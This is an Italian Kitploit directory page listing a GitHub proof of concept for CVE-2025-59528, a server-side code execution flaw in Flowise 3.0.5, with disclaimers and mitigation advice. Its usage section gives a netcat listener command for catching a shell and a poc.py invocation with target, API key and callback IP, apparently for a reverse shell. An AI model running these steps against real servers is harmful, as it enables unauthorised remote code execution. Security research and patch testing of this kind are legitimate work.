Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59528-PoC — Il PoC di CVE-2025-59528 | Kitploit
Strumenti/GitHubGitHub/sonnelon/cve-2025-59528-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

Il PoC di CVE-2025-59528

Vedi Repository
51 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-59528 PoC

Proof of Concept per la ricerca su CVE-2025-59528 in un ambiente di laboratorio isolato.

[!WARNING] DISCLAIMER

Questo progetto è destinato esclusivamente a scopi educativi, ricerca sulla sicurezza e test di sistemi che possiedi o per i quali hai ricevuto esplicita autorizzazione a effettuare test.

Non utilizzare questo PoC contro server di terze parti, servizi pubblici o infrastrutture senza il permesso del proprietario.

L'autore non è responsabile per danni, perdita di dati, interruzioni del servizio o conseguenze legali derivanti da un uso improprio di questo progetto.

Descrizione

Questo PoC dimostra il potenziale impatto di CVE-2025-59528, una vulnerabilità che riguarda l'elaborazione di mcpServerConfig controllato dall'utente in Flowise.

In determinate condizioni, la vulnerabilità può consentire a un attaccante di eseguire codice JavaScript arbitrario nel contesto lato server.

Versioni Vulnerabili

  • Flowise 3.0.5

Versione Corretta

  • Flowise 3.0.6+

Verifica sempre la versione esatta dell'installazione di destinazione prima di effettuare test.

Requisiti

  • Python 3
  • requests
  • Un'istanza di test Flowise locale o isolata
  • Un account autorizzato con i permessi richiesti

Installa la dipendenza Python:

pip install requests

Utilizzo

Esegui netcat per ottenere una shell:

nc -lvnp <YOUR_PORT>

Esegui il PoC con:

python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

Argomenti

ArgomentoDescrizione
-t, --targetURL dell'istanza di test Flowise
-o, --api_keyChiave API
-i, --ipIndirizzo IP della macchina di test
-p, --portPorta utilizzata dall'ambiente di test

Configurazione del Laboratorio

Il test deve essere eseguito all'interno di una rete virtuale o di laboratorio isolata.

┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

Non esporre un'istanza Flowise volutamente vulnerabile direttamente a Internet.

Mitigazione

Se stai eseguendo una versione vulnerabile di Flowise:

  1. Aggiorna Flowise a una versione corretta.
  2. Limita l'accesso alle API amministrative.
  3. Evita di concedere a utenti non attendibili i permessi necessari per accedere a funzionalità vulnerabili.
  4. Controlla i log del server per richieste sospette.
  5. Ripeti il test dell'installazione dopo l'aggiornamento.

Riferimenti

  • CVE: CVE-2025-59528
  • Software interessato: Flowise
  • Versione corretta: 3.0.6+

Nota Legale

Utilizzando questo progetto, riconosci di essere l'unico responsabile del rispetto di tutte le leggi e i regolamenti applicabili.

Utilizza questo PoC solo contro sistemi che possiedi o per i quali hai ricevuto esplicita autorizzazione a eseguire test di sicurezza.

Scarica lo strumento